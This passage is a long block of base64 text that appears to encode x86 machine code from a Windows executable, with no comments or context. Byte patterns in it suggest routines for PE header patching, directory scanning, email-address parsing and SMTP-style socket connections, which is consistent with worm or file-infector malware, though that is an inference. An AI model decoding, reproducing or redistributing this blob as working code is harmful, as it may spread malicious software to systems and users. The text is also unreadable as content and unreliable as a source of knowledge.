 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
